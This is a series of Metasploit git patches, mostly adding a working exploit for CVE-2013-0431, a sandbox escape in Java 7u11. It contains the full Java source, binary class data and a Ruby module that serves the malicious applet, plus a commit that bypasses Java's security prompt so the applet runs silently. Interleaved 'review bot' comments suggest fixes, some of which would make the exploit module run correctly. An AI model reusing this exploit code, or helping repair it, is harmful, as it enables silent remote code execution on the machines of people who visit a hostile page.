to x86 if we can't be sure return "x86" if resp.nil? or resp.code != 200 resp_tbl = parse_wql_response(resp) 
@@ -247,7 +234,7 @@ class Metasploit3 < Msf::Exploit::Remote def valid_login? data = winrm_wql_msg("Select Name,Status from Win32_Service") - resp,c = send_request_ntlm(data) + resp = send_winrm_request(data) unless resp.code == 200 return false end From accd6208433afb177c603ceb8e24efb165c24f6d Mon Sep 17 00:00:00 2001 From: David Maloney Date: Tue, 19 Feb 2013 23:50:30 -0600 Subject: [PATCH 035/139] Clean up pry --- lib/rex/proto/http/client.rb | 9 +++------ 1 file changed, 3 insertions(+), 6 deletions(-) diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index ba46142a45..cf2cab885e 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -8,8 +8,6 @@ require 'rex/proto/ntlm/constants' require 'rex/proto/ntlm/utils' require 'rex/proto/ntlm/exceptions' -require 'pry' - module Rex module Proto module Http @@ -356,15 +354,14 @@ class Client end end - return res if opts['username'].nil? or opts['username'] = '' + return res if opts['username'].nil? or opts['username'] == '' supported_auths = res.headers['WWW-Authenticate'] if supported_auths.include? 'Basic' if opts['headers'] - opts['headers']['Authorization'] = basic_auth_header(username,password) + opts['headers']['Authorization'] = basic_auth_header(opts['username'],opts['password'] ) else - opts['headers'] = { 'Authorization' => basic_auth_header(username,password)} + opts['headers'] = { 'Authorization' => basic_auth_header(opts['username'],opts['password'] )} end - req = request_cgi(opts) res = _send_recv(req,t,persist) return res From d88ad80116e83190660212bc4104d745e7ec27b4 Mon Sep 17 00:00:00 2001 
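Review bot: `valid_login?` dereferences `resp.code` immediately after the new `resp = send_winrm_request(data)` with no nil check, so a server that does not reply raises NoMethodError instead of returning false — unlike `temp_dir` and `check_remote_arch` in the same commit, which test `resp.nil?` first. Collapsing the `unless ... end` into `return false if resp.nil? || resp.code != 200` fixes it in one line. The method continues past the hunk.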
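Review bot: In the client.rb `@@ -356` hunk the rewritten early return still lets a response without a `WWW-Authenticate` header reach `supported_auths.include? 'Basic'`, where `supported_auths` is nil and raises NoMethodError; since this branch only makes sense in reaction to a challenge, extend the guard to `return res if opts['username'].nil? or opts['username'] == '' or res.headers['WWW-Authenticate'].nil?`. A short comment above the retry, `# Basic credentials are only base64-encoded; they are replayed whenever the server advertises Basic, regardless of transport`, would document the exposure for callers. The stray space in `opts['password'] )` on both new lines should go. The enclosing method starts and ends outside the hunk.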
From: jvazquez-r7 Date: Wed, 20 Feb 2013 16:39:53 +0100 Subject: [PATCH 036/139] Added first version of cve-2013-0431 --- data/exploits/cve-2013-0431/B.class | Bin 0 -> 619 bytes data/exploits/cve-2013-0431/Exploit.class | Bin 0 -> 2743 bytes external/source/exploits/cve-2013-0431/B.java | 19 +++ .../exploits/cve-2013-0431/Exploit.java | 93 ++++++++++++ .../source/exploits/cve-2013-0431/Makefile | 18 +++ .../multi/browser/java_jre17_jmxbean_2.rb | 134 ++++++++++++++++++ 6 files changed, 264 insertions(+) create mode 100755 data/exploits/cve-2013-0431/B.class create mode 100755 data/exploits/cve-2013-0431/Exploit.class create mode 100755 external/source/exploits/cve-2013-0431/B.java create mode 100755 external/source/exploits/cve-2013-0431/Exploit.java create mode 100644 external/source/exploits/cve-2013-0431/Makefile create mode 100644 modules/exploits/multi/browser/java_jre17_jmxbean_2.rb 
diff --git a/data/exploits/cve-2013-0431/B.class b/data/exploits/cve-2013-0431/B.class new file mode 100755 index 0000000000000000000000000000000000000000..953d5408a7a15e180bfb1570604cbab55bca2e5a GIT binary patch literal 619 zcmah`%TB^j5Is{W)moK@;v2<{g@r6!q9$r|g^vV+ad{~>qzWzRgUA=T)s;pQKfsSt zr^SdG6LXW9J7?ycb04p7PcHzrv7uuOSsk;O(~#3Kj|B~j8kRIH6Ouc&V+VVLgjsA5 z)I+x=2{TpOk*8s|DZRRAb{Lte1;V;M5xuyM**PY8p+lH8i`6U97v+v{+U2w6m9&Bi zL9e-?XUStb;wKNbq7eh*n9#6dU=?{nc0@b6v1Bi>T}Q*3fpruJsZn<*N}vP6W(@n% z3Ozd*l+Qi8&lYXj`jXhUA|XQl=j6U+N#8$ooxpQD9qAE_mOG*ocFo~E{@1SjdE;*f zt_}P^b_p3@2DQ(lo(M;@BisC^PyAlLx|L!B1tj^;2pWH&!kOQUqs~>Gv%-10^Z+V7 zLbh5 zl_4=Daa|yE)G!U_xIlSR^96xGmo=^nRQDOCJ}{lVs@o&l)eI#8S52U5*wND0`?Z`W z_MBvhP9n>Q1S%$Vr(bujS>pmHn);@+87+~~%*jMoM$6|@KEbeK8|Gx{ak}D0 z?Ia2wQWB;YutiV;kx3())jdA~d;PwPuKb<~$I-LOpCwjAU{heG6drJjh;7fsK zYR6qZs2%rd$34{^Gw*1oV`z>=uD^1LuOR*cCndZW>Pnz?4YQ9pH&0))5Q-Hf5cSlw zTrQ(Ki4JcPC>!fs0mq8!F<0wIVEdZe(!!@JKWpBZjIzPiCw$G+CiN_9B{5X!7go2A zv&J>IEBiD0V9rf^sbZMD>iK4XO;2l{8Y&Fwd9PhM@`dszyBoJ&DME%EV4?CR2sVv% zHurFzwGD?|C%NwFaj%<7$6D<&sy8*ebcGCa#=1_uBmScbU6ArKQxy4QFN)~d)MpE+ zPSexY5`e2p(X8%hdG7{DoYUqrY$isL)eKW$Ta*8&l{`jd=0X4icho}t7J9?wCp-CMH^lVR5+*ERN*Z$GN03VO%b;r z#Y!n{B00Xk5t#MIRrKfuQBrR{lhl9io+S23UNkG$`-WZ^A){W`mjZ1}*hW0BQ)i{g z3Ck|9Q}XN-p{(b?Uo)lMm%=VSzfF9-fdE+Vh;eM;s-83NBm`qi5cl~$t)Fm=THq?MOeaA} zeTjV%`z0-~jIEwbl*sbnI^hoOU_5*b8J|o4pIk*a54A*}d4TPYpz`MunGBX63e|?x z;KRGvuLf&F2a-~ii`YSiIMpR9)Nt!B*j)b|D%6UH-y@{Td$&SjVfpU`1d{=AkDh^( z7{IeQg|psVU?S$7*hLmjl9O(hz-cmZhVk?eK`*ttso#flv~iK{LFfr;B~<>z6SPVk zl6Xnt@MDxcMv&i0NBAbV&pk&M)GSGsoX?8>XuS}D2YBugb`G!*o=*m%yB=V7GRTDQ zVH#^j%WKfUMAl$0Q`zX2g&HX2x5by=dvsT*%pG(N4D+ZFA~;XFFQN{Y$muAKawo){ OV>nLjm$@p#iGKl|D8%ys literal 0 HcmV?d00001 diff --git a/external/source/exploits/cve-2013-0431/B.java b/external/source/exploits/cve-2013-0431/B.java new file mode 100755 index 0000000000..fec2767060 --- /dev/null +++ b/external/source/exploits/cve-2013-0431/B.java 
@@ -0,0 +1,19 @@ +import java.security.AccessController; +import java.security.PrivilegedExceptionAction; + +public class B + implements PrivilegedExceptionAction +{ + public B() + { + try + { + AccessController.doPrivileged(this); } catch (Exception e) { + } + } + + public Object run() { + System.setSecurityManager(null); + return new Object(); + } +} diff --git a/external/source/exploits/cve-2013-0431/Exploit.java b/external/source/exploits/cve-2013-0431/Exploit.java new file mode 100755 index 0000000000..2a399019f3 --- /dev/null +++ b/external/source/exploits/cve-2013-0431/Exploit.java 
@@ -0,0 +1,93 @@ +/* +* From Paunch with love (Java 1.7.0_11 Exploit) +* +* Deobfuscated from Cool EK by SecurityObscurity +* +* https://twitter.com/SecObscurity +*/ +import java.applet.Applet; +import com.sun.jmx.mbeanserver.Introspector; +import com.sun.jmx.mbeanserver.JmxMBeanServer; +import com.sun.jmx.mbeanserver.MBeanInstantiator; +import java.lang.invoke.MethodHandle; +import java.lang.invoke.MethodHandles.Lookup; +import java.lang.invoke.MethodType; +import java.lang.reflect.InvocationTargetException; +import java.lang.reflect.Method; +import javax.management.ReflectionException; +import java.io.*; +import metasploit.Payload; + +public class Exploit extends Applet +{ + + public void init() + { + + try + { + int length; + byte[] buffer = new byte[5000]; + ByteArrayOutputStream os = new ByteArrayOutputStream(); + + // read in the class file from the jar + InputStream is = getClass().getResourceAsStream("B.class"); + + // and write it out to the byte array stream + while( ( length = is.read( buffer ) ) > 0 ) + os.write( buffer, 0, length ); + + // convert it to a simple byte array + buffer = os.toByteArray(); + + Class class1 = gimmeClass("sun.org.mozilla.javascript.internal.Context"); + + Method method = getMethod(class1, "enter", true); + Object obj = method.invoke(null, new Object[0]); + Method method1 = getMethod(class1, "createClassLoader", false); + Object obj1 = method1.invoke(obj, new Object[1]); + + Class class2 = gimmeClass("sun.org.mozilla.javascript.internal.GeneratedClassLoader"); + Method method2 = getMethod(class2, "defineClass", false); + + Class my_class = (Class)method2.invoke(obj1, new Object[] { null, buffer }); + my_class.newInstance(); + + Payload.main(null); + + } + catch (Throwable localThrowable){} + + } + + + private Method getMethod(Class class1, String s, boolean flag) + { + try { + Method[] amethod = (Method[])Introspector.elementFromComplex(class1, "declaredMethods"); + Method[] amethod1 = amethod; + + for (int i = 0; i < 
amethod1.length; i++) { + Method method = amethod1[i]; + String s1 = method.getName(); + Class[] aclass = method.getParameterTypes(); + if ((s1 == s) && ((!flag) || (aclass.length == 0))) return method; + } + } catch (Exception localException) { } + + return null; + } + + private Class gimmeClass(String s) throws ReflectionException, ReflectiveOperationException + { + Object obj = null; + JmxMBeanServer jmxmbeanserver = (JmxMBeanServer)JmxMBeanServer.newMBeanServer("", null, null, true); + MBeanInstantiator mbeaninstantiator = jmxmbeanserver.getMBeanInstantiator(); + + Class class1 = Class.forName("com.sun.jmx.mbeanserver.MBeanInstantiator"); + Method method = class1.getMethod("findClass", new Class[] { String.class, ClassLoader.class }); + return (Class)method.invoke(mbeaninstantiator, new Object[] { s, obj }); + } + +} + diff --git a/external/source/exploits/cve-2013-0431/Makefile b/external/source/exploits/cve-2013-0431/Makefile new file mode 100644 index 0000000000..7c77a9c3b4 --- /dev/null +++ b/external/source/exploits/cve-2013-0431/Makefile @@ -0,0 +1,18 @@ +# rt.jar must be in the classpath! + +CLASSES = \ + Exploit.java \ + B.java + +.SUFFIXES: .java .class +.java.class: + javac -source 1.2 -target 1.2 -cp "../../../../data/java" $*.java + +all: $(CLASSES:.java=.class) + +install: + mv Exploit.class ../../../../data/exploits/cve-2013-0431/ + mv B.class ../../../../data/exploits/cve-2013-0431/ + +clean: + rm -rf *.class diff --git a/modules/exploits/multi/browser/java_jre17_jmxbean_2.rb b/modules/exploits/multi/browser/java_jre17_jmxbean_2.rb new file mode 100644 index 0000000000..32301affd6 --- /dev/null +++ b/modules/exploits/multi/browser/java_jre17_jmxbean_2.rb 
@@ -0,0 +1,134 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require 'rex' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpServer::HTML + include Msf::Exploit::EXE + + include Msf::Exploit::Remote::BrowserAutopwn + autopwn_info({ :javascript => false }) + + def initialize( info = {} ) + + super( update_info( info, + 'Name' => 'Java Applet JMX Remote Code Execution', + 'Description' => %q{ + This module abuses the JMX classes from a Java Applet to run arbitrary Java + code outside of the sandbox as exploited in the wild in February of 2013. The + vulnerability affects Java version 7u11 and earlier. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Unknown', # Vulnerability discovery and exploit in the wild + 'Adam Gowdiak', # Vulnerability discovery + 'SecurityObscurity', # Exploit analysis and deobfuscation + 'juan vazquez' # Metasploit module + ], + 'References' => + [ + [ 'CVE', '2013-0431' ], + [ 'OSVDB', '89613' ], + [ 'BID', '57726' ], + [ 'URL', 'http://www.security-explorations.com/materials/SE-2012-01-ORACLE-8.pdf' ], + [ 'URL', 'http://www.security-explorations.com/materials/SE-2012-01-ORACLE-9.pdf' ], + [ 'URL', 'http://security-obscurity.blogspot.com.es/2013/01/about-new-java-0-day-vulnerability.html' ], + [ 'URL', 'http://pastebin.com/QWU1rqjf' ] + ], + 'Platform' => [ 'java', 'win', 'osx', 'linux' ], + 'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true }, + 'Targets' => + [ + [ 'Generic (Java Payload)', + { + 'Platform' => ['java'], + 'Arch' => ARCH_JAVA, + } + ], + [ 'Windows x86 (Native Payload)', + { + 'Platform' => 'win', + 'Arch' => ARCH_X86, + } + ], + [ 'Mac OS X x86 (Native Payload)', + { + 'Platform' => 'osx', + 'Arch' => ARCH_X86, + } + ], 
+ [ 'Linux x86 (Native Payload)', + { + 'Platform' => 'linux', + 'Arch' => ARCH_X86, + } + ], + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Jan 19 2013' + )) + end + + + def setup + path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-0431", "Exploit.class") + @exploit_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) } + path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-0431", "B.class") + @loader_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) } + + @exploit_class_name = rand_text_alpha("Exploit".length) + @exploit_class.gsub!("Exploit", @exploit_class_name) + super + end + + def on_request_uri(cli, request) + print_status("handling request for #{request.uri}") + + case request.uri + when /\.jar$/i + jar = payload.encoded_jar + jar.add_file("#{@exploit_class_name}.class", @exploit_class) + jar.add_file("B.class", @loader_class) + metasploit_str = rand_text_alpha("metasploit".length) + payload_str = rand_text_alpha("payload".length) + jar.entries.each { |entry| + entry.name.gsub!("metasploit", metasploit_str) + entry.name.gsub!("Payload", payload_str) + entry.data = entry.data.gsub("metasploit", metasploit_str) + entry.data = entry.data.gsub("Payload", payload_str) + } + jar.build_manifest + + send_response(cli, jar, { 'Content-Type' => "application/octet-stream" }) + when /\/$/ + payload = regenerate_payload(cli) + if not payload + print_error("Failed to generate the payload.") + send_not_found(cli) + return + end + send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' }) + else + send_redirect(cli, get_resource() + '/', '') + end + + end + + def generate_html + html = %Q|Loading, Please Wait...| + html += %Q|

Loading, Please Wait...

| + html += %Q|| + html += %Q|| + return html + end + +end From d7b89a22281d72089b0357dbe3904fdc8804601c Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Wed, 20 Feb 2013 17:50:47 +0100 Subject: [PATCH 037/139] added security level bypass --- data/exploits/cve-2013-0431/Exploit.class | Bin 2743 -> 2744 bytes data/exploits/cve-2013-0431/Exploit.ser | Bin 0 -> 1517 bytes .../multi/browser/java_jre17_jmxbean_2.rb | 57 ++++++++---------- 3 files changed, 25 insertions(+), 32 deletions(-) create mode 100755 data/exploits/cve-2013-0431/Exploit.ser diff --git a/data/exploits/cve-2013-0431/Exploit.class b/data/exploits/cve-2013-0431/Exploit.class index 526a59dbaf3d13c6c037fb0b22cd78fd6a6ae2e5..f76c43d3e17695bf6e445aec23cff58a1de7daef 100755 GIT binary patch delta 16 Ycmdlkx_jqk<*2SIVV@?u&+BQ&GsDcR zz1u^@l>&vg6dYuAVM3P5IH_dc7leWtZQw|^M^e)@O#-k;aM{kZ}wUD#n!gx2y?fh{E+ zX3oKlu2;&Miz_a;%bSN!0}sgj#ku*J+dp9v#qZbNd~5shr9aO3rb};{af#;r+9&p( z%P-tmg?a~GjTYiQ8qNfNh;f@ab`Oo^N)F)SNJXh_<&nTUO1S}C4T8IdO$oxpi4r`@ zPmG%K7)=K*$Vg4Jk|>=W!bW*;ur~}jHQCHHTMNuV7aB3Qnz?9<#=+}LOqVBPH$(q! zmk7dd2$rkV-A)Mp(i!+%$|OtB5Ue&~S)bBzaCr%8^9f3ym?y5NOW>vm`ST~=ee~PA z-+ZwO*9P!1OPxCQ=~K4Sj?na^k3>=09jKqGRK~Wa1Br$H|BzTi$*8*Vhp>TDV&*op z4+e1MJd?LDw?}i_05-y%SL(p}IFK-aO`b?)@D6G!r0c*{ZWrN&Vi3AVABM*+Wb~0L*qCtXnF)s-$tLLAmPg!)JjgaB&W?PXwkJhCfD78-sMM%VsZGdc zZOTK>cAz@ru^V?_C8J;dyoUZ59zlgleM<2p#uMjYds&v263W+XGa56QU_aGb8JdDO z=8#h)`kT~anpz}poyCySdXySVaM(FxFo@`~5tG(kW)dWGSC)WS#?5wlbufh8XNy50 z7A>1PE}BFQ8C)CDz&O}inmQ(d_cWr?%yaYEHYhNmB1SV0yK```(hV}gFZ$Di>;5<| zN^xBCWhpfUvC`~2!(~F6b&Y7eSC8EyKU(Qj+Y%l8+{4HPPV0-}1-qxp^FFyVu^=r(lfhNC~O25ZK&AMUYzkK^vW%zgHoeHc|CsJ!B z)cRZDzb8Ln76mQ64y=t6Mx$D%);{!@4(!>m@rq5?lf*Bw2_dJ13_b%5)goAbs1g;K F{tskD^4tIb literal 0 HcmV?d00001 diff --git a/modules/exploits/multi/browser/java_jre17_jmxbean_2.rb b/modules/exploits/multi/browser/java_jre17_jmxbean_2.rb index 32301affd6..43c42c764d 100644 --- a/modules/exploits/multi/browser/java_jre17_jmxbean_2.rb 
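Review bot: `setup` reads both class files with `File.open(path, "rb") {|fd| fd.read(fd.stat.size) }`, which `File.binread(path)` expresses in one call, and the two `File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-0431", ...)` lines could share a single base-directory local. In `on_request_uri`, `if not payload` reads more idiomatically as `unless payload`. Neither change alters behaviour; the HTML body of `generate_html` is not legible in this hunk and is not reviewed.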
+++ b/modules/exploits/multi/browser/java_jre17_jmxbean_2.rb 
@@ -78,44 +78,37 @@ class Metasploit3 < Msf::Exploit::Remote )) end - - def setup - path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-0431", "Exploit.class") - @exploit_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) } - path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-0431", "B.class") - @loader_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) } - - @exploit_class_name = rand_text_alpha("Exploit".length) - @exploit_class.gsub!("Exploit", @exploit_class_name) - super - end - def on_request_uri(cli, request) print_status("handling request for #{request.uri}") case request.uri when /\.jar$/i - jar = payload.encoded_jar - jar.add_file("#{@exploit_class_name}.class", @exploit_class) - jar.add_file("B.class", @loader_class) - metasploit_str = rand_text_alpha("metasploit".length) - payload_str = rand_text_alpha("payload".length) - jar.entries.each { |entry| - entry.name.gsub!("metasploit", metasploit_str) - entry.name.gsub!("Payload", payload_str) - entry.data = entry.data.gsub("metasploit", metasploit_str) - entry.data = entry.data.gsub("Payload", payload_str) - } - jar.build_manifest + paths = [ + [ "Exploit.ser" ], + [ "Exploit.class" ], + [ "B.class" ] + ] - send_response(cli, jar, { 'Content-Type' => "application/octet-stream" }) - when /\/$/ - payload = regenerate_payload(cli) - if not payload - print_error("Failed to generate the payload.") - send_not_found(cli) - return + p = regenerate_payload(cli) + + jar = p.encoded_jar + + paths.each do |path| + 1.upto(path.length - 1) do |idx| + full = path[0,idx].join("/") + "/" + if !(jar.entries.map{|e|e.name}.include?(full)) + jar.add_file(full, '') + end + end + fd = File.open(File.join( Msf::Config.install_root, "data", "exploits", "cve-2013-0431", path ), "rb") + data = fd.read(fd.stat.size) + jar.add_file(path.join("/"), data) + fd.close end + + print_status("Sending Applet.jar") + send_response( cli, jar.pack, { 'Content-Type' => 
"application/octet-stream" } ) + when /\/$/ send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' }) else send_redirect(cli, get_resource() + '/', '') @@ -126,7 +119,7 @@ class Metasploit3 < Msf::Exploit::Remote def generate_html html = %Q|Loading, Please Wait...| html += %Q|
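Review bot: In the new `.jar` branch each resource is read with an unblocked `File.open` followed by `fd.read(fd.stat.size)` and `fd.close`; if `jar.add_file` raises, the descriptor leaks, and `data = File.binread(File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-0431", path))` removes the manual close entirely. Every entry of `paths` is a one-element array, so the `1.upto(path.length - 1)` directory-creation loop never runs and can be dropped unless nested paths are planned; if it stays, `jar.entries.map{|e|e.name}.include?(full)` is better written `jar.entries.any? { |e| e.name == full }`. `on_request_uri` ends outside the hunk.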

Loading, Please Wait...

| - html += %Q|| + html += %Q|| html += %Q|| return html end From da9e58ef79440d86f77ee51e2d9549511676411c Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Wed, 20 Feb 2013 18:14:24 +0100 Subject: [PATCH 038/139] Added the java code to get the ser file --- .../exploits/cve-2013-0431/Serializer.java | 20 +++++++++++++++++++ 1 file changed, 20 insertions(+) create mode 100644 external/source/exploits/cve-2013-0431/Serializer.java diff --git a/external/source/exploits/cve-2013-0431/Serializer.java b/external/source/exploits/cve-2013-0431/Serializer.java new file mode 100644 index 0000000000..2dc2517937 --- /dev/null +++ b/external/source/exploits/cve-2013-0431/Serializer.java @@ -0,0 +1,20 @@ +import java.io.*; + +public class Serializer { + + public static void main(String [ ] args) + { + try { + Exploit b=new Exploit(); // target Applet instance + ByteArrayOutputStream baos=new ByteArrayOutputStream(); + ObjectOutputStream oos=new ObjectOutputStream(baos); + oos.writeObject(b); + FileOutputStream fos=new FileOutputStream("Exploit.ser"); + fos.write(baos.toByteArray()); + fos.close(); + } catch (Exception ex) { + ex.printStackTrace(); + } + } + +} From bf216cca5cd41350d172280d9ac30684c5087eb7 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Wed, 20 Feb 2013 18:14:53 +0100 Subject: [PATCH 039/139] description and references updated --- .../multi/browser/java_jre17_jmxbean_2.rb | 65 ++++++++++--------- 1 file changed, 35 insertions(+), 30 deletions(-) diff --git a/modules/exploits/multi/browser/java_jre17_jmxbean_2.rb b/modules/exploits/multi/browser/java_jre17_jmxbean_2.rb index 43c42c764d..c448bf968a 100644 --- a/modules/exploits/multi/browser/java_jre17_jmxbean_2.rb +++ b/modules/exploits/multi/browser/java_jre17_jmxbean_2.rb 
@@ -22,9 +22,10 @@ class Metasploit3 < Msf::Exploit::Remote super( update_info( info, 'Name' => 'Java Applet JMX Remote Code Execution', 'Description' => %q{ - This module abuses the JMX classes from a Java Applet to run arbitrary Java - code outside of the sandbox as exploited in the wild in February of 2013. The - vulnerability affects Java version 7u11 and earlier. + This module abuses the JMX classes from a Java Applet to run arbitrary Java code + outside of the sandbox as exploited in the wild in February of 2013. Additionally, + this module bypasses default security settings introduced in Java 7 Update 10 to run + unsigned applet without displaying any warning to the user. }, 'License' => MSF_LICENSE, 'Author' => @@ -42,7 +43,8 @@ class Metasploit3 < Msf::Exploit::Remote [ 'URL', 'http://www.security-explorations.com/materials/SE-2012-01-ORACLE-8.pdf' ], [ 'URL', 'http://www.security-explorations.com/materials/SE-2012-01-ORACLE-9.pdf' ], [ 'URL', 'http://security-obscurity.blogspot.com.es/2013/01/about-new-java-0-day-vulnerability.html' ], - [ 'URL', 'http://pastebin.com/QWU1rqjf' ] + [ 'URL', 'http://pastebin.com/QWU1rqjf' ], + [ 'URL', 'http://malware.dontneedcoffee.com/2013/02/cve-2013-0431-java-17-update-11.html' ] ], 'Platform' => [ 'java', 'win', 'osx', 'linux' ], 'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true }, 
@@ -83,43 +85,46 @@ class Metasploit3 < Msf::Exploit::Remote case request.uri when /\.jar$/i - paths = [ - [ "Exploit.ser" ], - [ "Exploit.class" ], - [ "B.class" ] - ] - - p = regenerate_payload(cli) - - jar = p.encoded_jar - - paths.each do |path| - 1.upto(path.length - 1) do |idx| - full = path[0,idx].join("/") + "/" - if !(jar.entries.map{|e|e.name}.include?(full)) - jar.add_file(full, '') - end - end - fd = File.open(File.join( Msf::Config.install_root, "data", "exploits", "cve-2013-0431", path ), "rb") - data = fd.read(fd.stat.size) - jar.add_file(path.join("/"), data) - fd.close - end - - print_status("Sending Applet.jar") - send_response( cli, jar.pack, { 'Content-Type' => "application/octet-stream" } ) + print_status("Sending JAR") + send_response( cli, generate_jar, { 'Content-Type' => "application/octet-stream" } ) when /\/$/ + print_status("Sending HTML") send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' }) else send_redirect(cli, get_resource() + '/', '') end + end + def generate_jar + paths = [ + [ "Exploit.ser" ], + [ "Exploit.class" ], + [ "B.class" ] + ] + + p = regenerate_payload(cli) + + jar = p.encoded_jar + + paths.each do |path| + 1.upto(path.length - 1) do |idx| + full = path[0,idx].join("/") + "/" + if !(jar.entries.map{|e|e.name}.include?(full)) + jar.add_file(full, '') + end + end + fd = File.open(File.join( Msf::Config.install_root, "data", "exploits", "cve-2013-0431", path ), "rb") + data = fd.read(fd.stat.size) + jar.add_file(path.join("/"), data) + fd.close + end + return jar.pack end def generate_html html = %Q|Loading, Please Wait...| html += %Q|

Loading, Please Wait...

| - html += %Q|| + html += %Q|| html += %Q|| return html end From 4a84528ecfaff4bc780be129e47ef6cd54666bd4 Mon Sep 17 00:00:00 2001 From: James Lee Date: Wed, 20 Feb 2013 15:02:12 -0600 Subject: [PATCH 040/139] Move pending messages to it()'s args --- spec/lib/rex/proto/http/client_spec.rb | 119 ++++++------------------- 1 file changed, 28 insertions(+), 91 deletions(-) diff --git a/spec/lib/rex/proto/http/client_spec.rb b/spec/lib/rex/proto/http/client_spec.rb index de8c68f186..6505655267 100644 --- a/spec/lib/rex/proto/http/client_spec.rb +++ b/spec/lib/rex/proto/http/client_spec.rb @@ -61,20 +61,11 @@ describe Rex::Proto::Http::Client do cli.close.should be_nil end - it "should send a request and receive a response" do - # cli.send_recv - pending excuse_needs_connection - end + it "should send a request and receive a response", :pending => excuse_needs_connection - it "should send a request and receive a response without auth handling" do - # cli._send_recv - pending excuse_needs_connection - end + it "should send a request and receive a response without auth handling", :pending => excuse_needs_connection - it "should send a request" do - # cli.send_request - pending excuse_needs_connection - end + it "should send a request", :pending => excuse_needs_connection it "should test for credentials" do # cli.should_not have_creds @@ -83,9 +74,7 @@ describe Rex::Proto::Http::Client do pending "Should actually respond to :has_creds" end - it "should send authentication" do - pending excuse_needs_connection - end + it "should send authentication", :pending => excuse_needs_connection it "should produce a basic authentication header" do u = "user1" 
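Review bot: `generate_jar` calls `regenerate_payload(cli)` but takes no parameters, so `cli` is undefined inside it and the `.jar` branch will raise NameError on the first request; the caller in `on_request_uri` has the connection in hand, so the signature should be `def generate_jar(cli)` and the call `send_response( cli, generate_jar(cli), { 'Content-Type' => "application/octet-stream" } )`. The unblocked `File.open`/`fd.close` pair carried over into the new method still leaks the descriptor if `add_file` raises; `File.binread` would avoid both the leak and the explicit close. `return jar.pack` can be the bare expression `jar.pack` as the last line.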
@@ -94,20 +83,11 @@ describe Rex::Proto::Http::Client do cli.basic_auth_header("user1","pass1").should == "Basic #{b64}" end - it "should perform digest authentication" do - # cli.digest_auth - pending excuse_needs_auth - end + it "should perform digest authentication", :pending => excuse_needs_auth - it "should perform negotiate authentication" do - # cli.negotiate_auth - pending excuse_needs_auth - end + it "should perform negotiate authentication", :pending => excuse_needs_auth - it "should get a response" do - # cli.read_response - pending excuse_needs_connection - end + it "should get a response", :pending => excuse_needs_connection it "should end a connection with a stop" do cli.stop.should be_nil 
@@ -124,96 +104,53 @@ describe Rex::Proto::Http::Client do this_cli.pipelining?.should be_true end - it "should return an encoded URI" do - pending excuse_lazy :set_encode_uri - end + it "should return an encoded URI", :pending => excuse_lazy(:set_encode_uri) - it "should return an encoded query string" do - pending excuse_lazy :set_encode_qa - end + it "should return an encoded query string", :pending => excuse_lazy(:set_encode_qa) # These set_ methods all exercise the evasion opts, looks like - it "should set and return the URI" do - pending excuse_lazy :set_uri - end + it "should set and return the URI", :pending => excuse_lazy(:set_uri) - it "should set and return the CGI" do - pending excuse_lazy :set_cgi - end + it "should set and return the CGI", :pending => excuse_lazy(:set_cgi) - it "should set and return the HTTP verb" do - pending excuse_lazy :set_method - end + it "should set and return the HTTP verb", :pending => excuse_lazy(:set_method) - it "should set and return the version string" do - pending excuse_lazy :set_version - end + it "should set and return the version string", :pending => excuse_lazy(:set_version) - it "should set and return the HTTP seperator and body string" do - pending excuse_lazy :set_body - end + it "should set and return the HTTP seperator and body string", :pending => excuse_lazy(:set_body) - it "should set and return the path" do - pending excuse_lazy :set_path_info - end + it "should set and return the path", :pending => excuse_lazy(:set_path_info) - it "should set and return the whitespace between method and URI" do - pending excuse_lazy :set_method_uri_spacer - end + it "should set and return the whitespace between method and URI", :pending => excuse_lazy(:set_method_uri_spacer) - it "should set and return the whitespace between the version and URI" do - pending excuse_lazy :set_uri_version_spacer - end + it "should set and return the whitespace between the version and URI", :pending => excuse_lazy(:set_uri_version_spacer) - 
it "should set and return padding before the URI" do - pending excuse_lazy :set_uri_prepend - end + it "should set and return padding before the URI", :pending => excuse_lazy(:set_uri_prepend) it "should set and return padding after the URI" do cli.set_uri_append.should be_empty end - it "should set and return the host header" do - pending excuse_lazy :set_host_header - end + it "should set and return the host header", :pending => excuse_lazy(:set_host_header) - it "should set and return the agent header" do - pending excuse_lazy :set_agent_header - end + it "should set and return the agent header", :pending => excuse_lazy(:set_agent_header) - it "should set and return the cookie header" do - pending excuse_lazy :set_cookie_header - end + it "should set and return the cookie header", :pending => excuse_lazy(:set_cookie_header) + it "should set and return the content-type header", :pending => excuse_lazy(:set_cookie_header) - it "should set and return the content-type header" do - pending excuse_lazy :set_cookie_header - end + it "should set and return the content-length header", :pending => excuse_lazy(:set_content_len_header) - it "should set and return the content-length header" do - pending excuse_lazy :set_content_len_header - end + it "should set and return the basic authentication header", :pending => excuse_lazy(:set_basic_auth_header) - it "should set and return the basic authentication header" do - pending excuse_lazy :set_basic_auth_header - end + it "should set and return any extra headers", :pending => excuse_lazy(:set_extra_headers) - it "should set and return any extra headers" do - pending excuse_lazy :set_extra_headers - end + it "should set the chunked encoding header", :pending => excuse_lazy(:set_chunked_header) - it "should set the chunked encoding header" do - pending excuse_lazy :set_chunked_header - end + it "should set and return raw_headers", :pending => "#set_raw_headers() doesn't seem to actually do anything" 